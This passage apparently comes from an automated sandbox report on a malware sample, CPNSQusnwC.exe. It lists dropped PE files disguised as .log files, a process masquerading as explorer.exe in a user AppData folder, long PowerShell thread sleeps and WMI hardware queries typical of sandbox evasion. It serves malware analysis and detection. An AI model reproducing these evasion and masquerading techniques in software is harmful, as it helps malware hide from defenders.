                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\fJbhCUkS.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\xQsMWHQg.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\zJHvHEBf.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\gljzVSiX.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\eJSyBaRc.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\jWOPcftP.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\cSkqvYkZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\vEieQmso.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\UOyjNWIs.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\TvSaQXjt.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\scaNtKAs.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\sUqvPban.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\dGozhlgX.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\SSKIxalp.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\uaPNCQpm.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\WJAzEWli.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\tQeVfYwq.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\GzLcGkVO.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\LmdbigkC.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\ejwQzjeb.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\QhesqMaw.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\TkfSyAEq.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\nDhGzpaM.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\FBkUkkGT.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe TID: 5328Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep count: 8142 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep count: 7688 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6320Thread sleep count: 594 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep count: 8287 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep count: 135 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep count: 8133 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep count: 8341 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep count: 80 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 8195 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 639 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 8016 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep count: 7682 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep count: 408 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 7805 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep count: 7676 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep count: 398 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 8022 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 7405 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -12912720851596678s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep count: 191 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 8092Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -599579s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -599422s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -599289s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -599157s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -599008s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -598823s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -598610s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9196Thread sleep time: -10800000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -598012s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597641s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9196Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597422s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597277s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -597000s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596844s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596704s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596547s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596384s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596219s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -596037s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595655s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595527s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595396s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -595235s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594922s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594645s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594513s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594389s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594281s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -594125s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593919s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593790s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593671s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593562s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593453s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593336s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593208s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -593066s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592929s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592815s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592701s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592594s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592466s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592359s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592204s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -592047s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591923s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591812s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591688s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591563s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591453s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591344s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591222s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -591094s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590979s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590874s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590750s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590579s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590468s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590358s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590215s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -590006s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589750s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589488s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589344s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589233s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -589104s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588948s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588829s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588718s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588610s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588485s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588360s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588235s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -588100s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587978s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587875s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587755s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587641s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587532s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -587307s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586768s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586547s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586438s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe TID: 9212Thread sleep time: -586313s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340Thread sleep count: 1091 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8908Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504Thread sleep count: 660 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704Thread sleep count: 870 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep count: 1008 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8924Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep count: 1228 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9016Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8892Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep count: 989 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8668Thread sleep count: 974 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9112Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8968Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep count: 949 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9084Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8944Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8676Thread sleep count: 1442 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9088Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8932Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep count: 1327 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9104Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8976Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep count: 2738 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9080Thread sleep time: -11068046444225724s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8884Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8844Thread sleep count: 1191 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9048Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8916Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343DEC5A GetSystemInfo,0_2_00007FFD343DEC5A
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
